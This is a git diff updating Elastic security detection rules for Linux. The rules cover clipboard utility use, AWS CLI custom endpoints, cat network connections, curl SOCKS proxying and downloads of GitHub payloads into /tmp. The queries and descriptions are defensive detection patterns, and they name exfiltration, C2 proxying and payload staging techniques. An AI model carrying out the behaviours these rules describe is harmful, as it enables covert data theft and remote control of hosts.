diff --git a/rules/linux/collection_linux_clipboard_activity.toml b/rules/linux/collection_linux_clipboard_activity.toml index a647398f892..8405123d085 100644 --- a/rules/linux/collection_linux_clipboard_activity.toml +++ b/rules/linux/collection_linux_clipboard_activity.toml @@ -1,18 +1,24 @@ [metadata] creation_date = "2023/07/27" -integration = ["endpoint", "auditd_manager"] +integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2025/09/16" [rule] author = ["Elastic"] description = """ -This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process group -leader. Adversaries may collect data stored in the clipboard from users copying information within or between -applications. +This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process parent. +Adversaries may collect data stored in the clipboard from users copying information within or between applications. """ from = "now-9m" -index = ["logs-endpoint.events.*", "endgame-*", "auditbeat-*", "logs-auditd_manager.auditd-*"] +index = [ + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*", + ] language = "kuery" license = "Elastic License v2" name = "Linux Clipboard Activity Detected" @@ -27,6 +33,8 @@ tags = [ "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", "Resources: Investigation Guide", ] timestamp_override = "event.ingested" @@ -88,7 +96,7 @@ reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" -value = ["host.id", "process.group_leader.executable"] +value = ["host.id", "process.parent.executable"] [[rule.new_terms.history_window_start]] field = "history_window_start" diff --git a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml index 06eacbf8b12..34a66025f8a 100644 --- a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml +++ b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml @@ -1,16 +1,27 @@ [metadata] creation_date = "2024/08/21" -integration = ["endpoint"] +integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2025/09/16" [rule] author = ["Elastic"] description = """ -Detects the use of the AWS CLI with the `--endpoint-url` argument, which allows users to specify a custom endpoint URL for AWS services. This can be leveraged by adversaries to redirect API requests to non-standard or malicious endpoints, potentially bypassing typical security controls and logging mechanisms. This behavior may indicate an attempt to interact with unauthorized or compromised infrastructure, exfiltrate data, or perform other malicious activities under the guise of legitimate AWS operations. +Detects the use of the AWS CLI with the "--endpoint-url" argument, which allows users to specify a custom endpoint URL +for AWS services. This can be leveraged by adversaries to redirect API requests to non-standard or malicious endpoints, +potentially bypassing typical security controls and logging mechanisms. This behavior may indicate an attempt to interact +with unauthorized or compromised infrastructure, exfiltrate data, or perform other malicious activities under the guise +of legitimate AWS operations. """ from = "now-9m" -index = ["logs-endpoint.events.process-*"] +index = [ + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*", + ] language = "kuery" license = "Elastic License v2" name = "AWS CLI Command with Custom Endpoint URL" @@ -21,17 +32,23 @@ risk_score = 47 rule_id = "349276c0-5fcf-11ef-b1a9-f661ea17fbce" severity = "medium" tags = [ - "Data Source: Elastic Defend", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", ] type = "new_terms" timestamp_override = "event.ingested" query = ''' -host.os.type: "linux" and event.category: "process" and process.name: "aws" and process.args: "--endpoint-url" +host.os.type:"linux" and event.category:"process" and +event.action:("exec" or "exec_event" or "executed" or "process_started") and +process.name:"aws" and process.args:"--endpoint-url" ''' note = """## Triage and analysis @@ -71,21 +88,21 @@ The AWS CLI allows users to interact with AWS services via command-line, offerin [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [rule.new_terms] field = "new_terms_fields" -value = ["user.name"] +value = ["host.id"] + [[rule.new_terms.history_window_start]] field = "history_window_start" -value = "now-10d" +value = "now-3d" diff --git a/rules/linux/command_and_control_cat_network_activity.toml b/rules/linux/command_and_control_cat_network_activity.toml index e0ce29eee9d..cab972324d4 100644 --- a/rules/linux/command_and_control_cat_network_activity.toml +++ b/rules/linux/command_and_control_cat_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2025/09/16" [transform] [[transform.osquery]] @@ -29,7 +29,6 @@ query = "SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.u label = "Osquery - Retrieve Process Info" query = "SELECT name, cmdline, parent, path, uid FROM processes" - [rule] author = ["Elastic"] description = """ @@ -138,23 +137,22 @@ tags = [ "Resources: Investigation Guide", ] type = "eql" - query = ''' -sequence by host.id, process.entity_id with maxspan=1s +sequence by host.id, process.entity_id with maxspan=3s [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "cat" and process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] [network where host.os.type == "linux" and event.action in ("connection_attempted", "disconnect_received") and - process.name == "cat" and not (destination.ip == null or destination.ip == "0.0.0.0" or cidrmatch( - destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", - "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", - "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", - "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", "FE80::/10", - "FF00::/8" + process.name == "cat" and not ( + destination.ip == null or destination.ip == "0.0.0.0" or cidrmatch( + destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", + "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", + "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", + "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", "FE80::/10", + "FF00::/8" ) )] ''' - [[rule.threat]] framework = "MITRE ATT&CK" @@ -162,6 +160,7 @@ framework = "MITRE ATT&CK" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -169,6 +168,7 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -176,4 +176,3 @@ framework = "MITRE ATT&CK" id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/linux/command_and_control_curl_socks_proxy_detected.toml b/rules/linux/command_and_control_curl_socks_proxy_detected.toml index 6fc18eaaca8..cfdde4aab58 100644 --- a/rules/linux/command_and_control_curl_socks_proxy_detected.toml +++ b/rules/linux/command_and_control_curl_socks_proxy_detected.toml @@ -2,13 +2,13 @@ creation_date = "2024/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2025/09/16" [rule] author = ["Elastic"] description = """ -This rule detects the use of the `curl` command-line tool with SOCKS proxy options, launched from an unusual parent -process. Attackers may use `curl` to establish a SOCKS proxy connection to bypass network restrictions and exfiltrate +This rule detects the use of the "curl" command-line tool with SOCKS proxy options, launched from an unusual parent +process. Attackers may use "curl" to establish a SOCKS proxy connection to bypass network restrictions and exfiltrate data or communicate with C2 servers. """ from = "now-9m" @@ -16,7 +16,7 @@ index = ["logs-endpoint.events.process*"] language = "eql" license = "Elastic License v2" name = "Curl SOCKS Proxy Activity from Unusual Parent" -risk_score = 21 +risk_score = 47 rule_id = "734239fe-eda8-48c0-bca8-9e3dafd81a88" setup = """## Setup @@ -56,7 +56,7 @@ In order to capture this behavior, this rule requires a specific configuration o After saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly. For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html). """ -severity = "low" +severity = "medium" tags = [ "Domain: Endpoint", "OS: Linux", @@ -71,13 +71,18 @@ query = ''' process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "curl" and ( process.parent.executable like ( - "/dev/shm/*", "/tmp/*", "/var/tmp/*", "/var/run/*", "/root/*", "/boot/*", "/var/www/html/*", "/opt/.*" + "/dev/shm/*", "/tmp/*", "/var/tmp/*", "/var/run/*", "/root/*", "/boot/*", "/var/www/*", "/opt/.*", + "/home/*" ) or - process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") or + process.parent.name like ".*" ) and ( process.args like ("--socks5-hostname", "--proxy", "--preproxy", "socks5*") or process.args == "-x" or - process.env_vars like ("http_proxy=socks5h://*", "HTTPS_PROXY=socks5h://*", "ALL_PROXY=socks5h://*") + process.env_vars like~ ("http_proxy=socks5h://*", "HTTPS_PROXY=socks5h://*", "ALL_PROXY=socks5h://*") +) and not ( + process.parent.args == "/opt/rudder/share/commands/agent-run" or + process.args == "http://localhost:8080/rudder/api/status" ) ''' note = """## Triage and analysis diff --git a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml index 8b5187ecb2b..8e5b77e396f 100644 --- a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml +++ b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/07/07" +updated_date = "2025/09/16" [rule] author = ["Elastic"] @@ -12,7 +12,7 @@ the creation of files in suspicious directories such as /tmp, /var/tmp, or /dev/ attempt to download a payload, exploit or tool. """ from = "now-9m" -index = ["logs-endpoint.events.*"] +index = ["logs-endpoint.events.process*", "logs-endpoint.events.file*"] language = "eql" license = "Elastic License v2" name = "Git Repository or File Download to Suspicious Directory" @@ -106,6 +106,9 @@ sequence by process.entity_id, host.id with maxspan=10s [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( (process.name == "git" and process.args == "clone") or (process.name in ("wget", "curl") and process.command_line like~ "*github*") + ) and not ( + process.parent.name in ("git", "cmake") or + process.parent.args like "/root/.ansible/tmp/ansible*" )] [file where host.os.type == "linux" and event.type == "creation" and file.path like ("/tmp/*", "/var/tmp/*", "/dev/shm/*")] '''